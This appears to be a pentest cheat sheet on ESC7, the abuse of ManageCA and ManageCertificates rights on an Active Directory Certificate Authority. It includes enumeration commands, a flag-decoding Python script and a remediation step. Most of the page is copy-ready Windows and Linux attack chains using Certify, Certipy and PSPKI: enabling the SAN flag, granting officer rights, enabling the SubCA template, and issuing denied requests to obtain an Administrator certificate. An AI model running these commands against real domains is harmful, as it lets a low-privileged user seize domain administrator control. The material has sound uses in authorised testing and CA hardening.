ESC7
Vulnerable Certificate Authority Access Control
Two sets of permissions on the CA object itself pose a security risk when held by low-privileged principals:
- ManageCA (or CA Administrator)
- ManageCertificates (or Certificate Manager)
Enumerate the CA ACL with certsrv.msc (CA properties, Security tab) or remotely with PSPKI, looking for non-admin principals holding ManageCA or ManageCertificates:
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -expand Access
Query the CA's policy-module EditFlags value with certutil and check whether EDITF_ATTRIBUTESUBJECTALTNAME2 (0x40000, decimal 262144) is set. With the default flag set the value reads 15014e (1376590) when the bit is set and 11014e (1114446) when it is cleared; certutil also lists the names of the individual EDITF_* flags that are set.
PS /home/bobbuilder> certutil.exe -config "dc.minions.com\<ca_name>" -getreg "policy\EditFlags"
Enumerate using the PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -ExpandProperty Access
Windows
Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2)
A principal with ManageCA can change CA settings remotely with PSPKI, including toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (the same flag ESC6 relies on). Once the flag is active, a SAN can be supplied in the request attributes for any template, so a certificate for an arbitrary UPN can be requested. ESC6 was addressed by Microsoft's May 2022 update (KB5014754), so Attack 2 may be the better alternative against a patched CA.
Note: the flag change has no effect until the CA service (CertSvc) is restarted. ManageCA holders are allowed to restart the service, but they cannot do so remotely.
- Request a certificate, supplying the target UPN as SAN (only honoured once the flag above is active and CertSvc has restarted)
PS /home/bobbuilder> .\certify.exe request /ca:<ca_name> /template:ApprovalNeeded /altname:administrator
- Import the PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
- Approve the pending request (needs ManageCertificates; 3361 is the request ID returned by certify)
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-PendingRequest -RequestID 3361 | Approve-CertificateRequest
- Download the issued certificate
PS /home/bobbuilder> .\certify.exe download /ca:<ca_name> /id:3361
Post Attack
Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell (PSPKI). $ConfigReader is a PSPKI CertSrvRegManagerD object bound to the CA host (dc.minions.com is a placeholder). 1114446 (0x11014e) is the default EditFlags value with the SAN bit cleared, so this assumes the CA otherwise runs default flags; write it back, read it again to verify, and restart CertSvc for the change to take effect.
PS /home/bobbuilder> $ConfigReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "dc.minions.com"
PS /home/bobbuilder> $ConfigReader.SetRootNode($true)
PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
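The EditFlags value returned by the certutil query in the enumeration section, and the cleared value written back in the post-attack step, are plain bitmasks. The script below is an added example, not code from this page, from certutil or from PSPKI: it parses certutil -getreg output, names every set EDITF_* bit, tests for EDITF_ATTRIBUTESUBJECTALTNAME2 and computes the value to write back without discarding the other flags (which a hard-coded 1114446 would do on a CA with non-default flags). The flag table is transcribed from the Windows SDK header certsrv.h; the sample certutil output is constructed, modelled on the real layout, and the CA name in it is a placeholder.

```python
"""Decode an AD CS policy-module EditFlags DWORD and check the
EDITF_ATTRIBUTESUBJECTALTNAME2 bit. Added example; not code from the page."""
import re

# EDITF_* bit values as defined in the Windows SDK header certsrv.h.
EDITF_FLAGS = {
    0x00000001: "EDITF_ENABLEREQUESTEXTENSIONS",
    0x00000002: "EDITF_REQUESTEXTENSIONLIST",
    0x00000004: "EDITF_DISABLEEXTENSIONLIST",
    0x00000008: "EDITF_ADDOLDKEYUSAGE",
    0x00000010: "EDITF_ADDOLDCERTTYPE",
    0x00000020: "EDITF_ATTRIBUTEENDDATE",
    0x00000040: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x00000080: "EDITF_BASICCONSTRAINTSCA",
    0x00000100: "EDITF_ENABLEAKIKEYID",
    0x00000200: "EDITF_ATTRIBUTECA",
    0x00000400: "EDITF_IGNOREREQUESTERGROUP",
    0x00000800: "EDITF_ENABLEAKIISSUERNAME",
    0x00001000: "EDITF_ENABLEAKIISSUERSERIAL",
    0x00002000: "EDITF_ENABLEAKICRITICAL",
    0x00004000: "EDITF_SERVERUPGRADED",
    0x00008000: "EDITF_ATTRIBUTEEKU",
    0x00010000: "EDITF_ENABLEDEFAULTSMIME",
    0x00020000: "EDITF_EMAILOPTIONAL",
    0x00040000: "EDITF_ATTRIBUTESUBJECTALTNAME2",
    0x00080000: "EDITF_ENABLECHASECLIENTDC",
    0x00100000: "EDITF_AUDITCERTTEMPLATELOAD",
    0x00200000: "EDITF_DISABLEOLDOSCNUPN",
    0x00400000: "EDITF_DISABLELDAPPACKAGELIST",
    0x00800000: "EDITF_ENABLEUPNMAP",
    0x01000000: "EDITF_ENABLEOCSPREVNOCHECK",
    0x02000000: "EDITF_ENABLERENEWONBEHALFOF",
}
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

# Constructed sample, modelled on the layout certutil prints for
# `certutil -config "<host>\<ca_name>" -getreg policy\EditFlags`.
# Not captured from a real CA; "CA-minions" is a placeholder CA name.
SAMPLE_CERTUTIL_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-minions\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_AUDITCERTTEMPLATELOAD -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""


def parse_editflags(certutil_output: str) -> int:
    """Return the EditFlags DWORD from certutil -getreg output.

    certutil prints the value as hex followed by the decimal in parentheses;
    both are parsed and cross-checked so a mangled copy-paste is rejected.
    """
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)\s*\((\d+)\)",
                  certutil_output)
    if not m:
        raise ValueError("no EditFlags REG_DWORD line in certutil output")
    hex_value, dec_value = int(m.group(1), 16), int(m.group(2))
    if hex_value != dec_value:
        raise ValueError(f"hex {m.group(1)} and decimal {m.group(2)} disagree")
    return dec_value


def decode_editflags(value: int) -> list[str]:
    """Name every set bit, lowest bit first; unknown bits are reported, not dropped."""
    names = []
    for bit in range(32):
        mask = 1 << bit
        if value & mask:
            names.append(EDITF_FLAGS.get(mask, f"UNKNOWN_0x{mask:08x}"))
    return names


def san_attribute_allowed(value: int) -> bool:
    """True when EDITF_ATTRIBUTESUBJECTALTNAME2 is set (the ESC6 condition)."""
    return bool(value & EDITF_ATTRIBUTESUBJECTALTNAME2)


def cleared_value(value: int) -> int:
    """Value to write back with SetConfigEntry: SAN flag off, all other flags kept."""
    return value & ~EDITF_ATTRIBUTESUBJECTALTNAME2


if __name__ == "__main__":
    flags = parse_editflags(SAMPLE_CERTUTIL_OUTPUT)
    print(f"EditFlags = 0x{flags:x} ({flags})")
    for name in decode_editflags(flags):
        print("   ", name)
    if san_attribute_allowed(flags):
        print(f"SAN attribute honoured; remediate with SetConfigEntry({cleared_value(flags)}, ...)")
```

Run it against the saved output of the certutil query; on the constructed sample it reports the SAN flag set and 1114446 as the value to restore, which is the number used in the post-attack step above.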
Attack 2 (gain ManageCertificates right using ManageCA)
This attack only needs the ManageCA permission to start. It also relies on the ManageCertificates permission and on the SubCA certificate template being enabled, but a ManageCA holder can grant itself the former and enable the latter. The SubCA template lets the enrollee supply the subject (so an arbitrary UPN can be placed in the request), but only Domain Admins and Enterprise Admins are allowed to enroll, so our request is denied and stored as a failed request. ManageCertificates then lets us issue that failed request anyway.
- Grant ourselves Manage Certificates access (optional, if we don't already have it)
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -add-officer user1 -username user1@minions.com -password password1
- Enable the SubCA certificate template (optional, the SubCA template is enabled by default)
PS /home/bobbuilder> .\certipy.exe ca -username user1@minions.com -password password1 -target-ip <ip> -ca '<ca_name>' -enable-template 'SubCA'
- Request a certificate based on the SubCA template with the target UPN; the request is denied but is saved with a request ID
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template SubCA -upn administrator@minions.com
- Issue the failed request with our ManageCertificates right (7851 is the request ID returned above)
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -issue-request 7851 -username user1@minions.com -password password1
- Retrieve the issued certificate
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -retrieve 7851
Linux
Attack 1 (ManageCA rights)
- Add the Manage Certificates right to our own user
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -add-officer user1
- Request a certificate with a SAN from the SubCA template (Enrollee Supplies Subject: True); the request is denied but stored with a request ID
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template SubCA -upn Administrator
- Issue the denied request with the newly granted right
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 311
- Retrieve the certificate by its request ID, then authenticate with it
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 311
Attack 2 (ManageCertificates rights)
- Request a certificate from a template that requires CA manager approval (the template must still grant us enrollment and let the enrollee supply the subject; the approval requirement is what ManageCertificates bypasses)
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template> -upn Administrator
- Approve the pending request
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 591
- Retrieve the approved request
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 591